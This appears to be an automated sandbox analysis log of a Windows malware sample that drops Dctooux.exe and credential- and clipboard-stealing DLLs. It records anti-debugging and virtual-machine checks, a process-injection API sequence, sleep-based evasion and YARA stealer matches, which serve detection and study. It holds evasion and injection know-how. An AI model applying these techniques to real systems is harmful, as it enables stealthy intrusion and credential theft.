Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe API coverage: 3.1 %
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe API coverage: 1.6 %
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe API coverage: 8.1 %
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 7656 Thread sleep time: -1920000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 7716 Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 7708 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 7656 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_00408180
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_c92ec1cea5a09af2_e07fb967fe61390ff947874da9a18efae6cac7_8e61c4a5_95ca67f7-278d-440f-920c-862f52c2b333\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_c92ec1cea5a09af2_f9165ae4ce682ce742d9caa30eddae375d89b91_8e61c4a5_199673d7-74d3-4533-ae8f-04d3f7d3cc65\
Source: Amcache.hve.3.dr Binary or memory string: VMware
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Dctooux.exe, 0000001C.00000003.2467481991.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2886494083.0000000002EAC000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2886494083.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual RAM
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe, 00000000.00000002.1842701092.00000000069BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}cr
Source: Amcache.hve.3.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00439DBE
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0042F2A9 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0042F2A9
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 0_2_0043D5A2
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0043983B mov eax, dword ptr fs:[00000030h] 0_2_0043983B
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F79AA2 mov eax, dword ptr fs:[00000030h] 0_2_02F79AA2
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F7D809 mov eax, dword ptr fs:[00000030h] 0_2_02F7D809
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F4092B mov eax, dword ptr fs:[00000030h] 0_2_02F4092B
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F40D90 mov eax, dword ptr fs:[00000030h] 0_2_02F40D90
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02FF306B push dword ptr fs:[00000030h] 0_2_02FF306B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 20_2_0043D5A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0043983B mov eax, dword ptr fs:[00000030h] 20_2_0043983B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F29AA2 mov eax, dword ptr fs:[00000030h] 20_2_02F29AA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F2D809 mov eax, dword ptr fs:[00000030h] 20_2_02F2D809
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02EF092B mov eax, dword ptr fs:[00000030h] 20_2_02EF092B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02EF0D90 mov eax, dword ptr fs:[00000030h] 20_2_02EF0D90
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F93033 push dword ptr fs:[00000030h] 20_2_02F93033
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0043D5A2 mov eax, dword ptr fs:[00000030h] 28_2_0043D5A2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0043983B mov eax, dword ptr fs:[00000030h] 28_2_0043983B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_02E2454B push dword ptr fs:[00000030h] 28_2_02E2454B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048C0D90 mov eax, dword ptr fs:[00000030h] 28_2_048C0D90
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048FD809 mov eax, dword ptr fs:[00000030h] 28_2_048FD809
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048C092B mov eax, dword ptr fs:[00000030h] 28_2_048C092B
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048F9AA2 mov eax, dword ptr fs:[00000030h] 28_2_048F9AA2
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00442103 GetProcessHeap, 28_2_00442103
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0042102F SetUnhandledExceptionFilter, 0_2_0042102F
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004204FC
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00420ECA
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F7A025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_02F7A025
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F61131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_02F61131
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F60763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_02F60763
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_004204FC
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00439DBE
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00420ECA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F2A025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_02F2A025
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F11131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_02F11131
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_02F10763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 20_2_02F10763
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_004204FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_004204FC
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00420ECA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00420ECA
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0042102F SetUnhandledExceptionFilter, 28_2_0042102F
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_00439DBE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_00439DBE
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048E0763 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 28_2_048E0763
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048FA025 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_048FA025
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_048E1131 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 28_2_048E1131

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_004074F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree, 0_2_004074F0
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe"
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_004210B6 cpuid 0_2_004210B6
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Queries volume information: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll VolumeInformation
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0040B385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0040B385
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0040B2B0 GetUserNameA, 0_2_0040B2B0
Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: Dctooux.exe PID: 7652, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll, type: DROPPED
Source: Yara match File source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.Dctooux.exe.4930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.2ef0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.Dctooux.exe.4920000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.48c0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.4980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.2f40e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.4980000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.2ef0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.3.Dctooux.exe.4930000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.Dctooux.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.Dctooux.exe.48c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.Dctooux.exe.4920000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000003.2347714328.0000000004930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2885045669.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1841496983.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1736015546.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1644313832.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2886785798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1846693289.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1848101190.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1839369180.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll, type: DROPPED
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00431261 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext, 0_2_00431261
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00431F58 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_00431F58
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02F721BF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext, 0_2_02F721BF
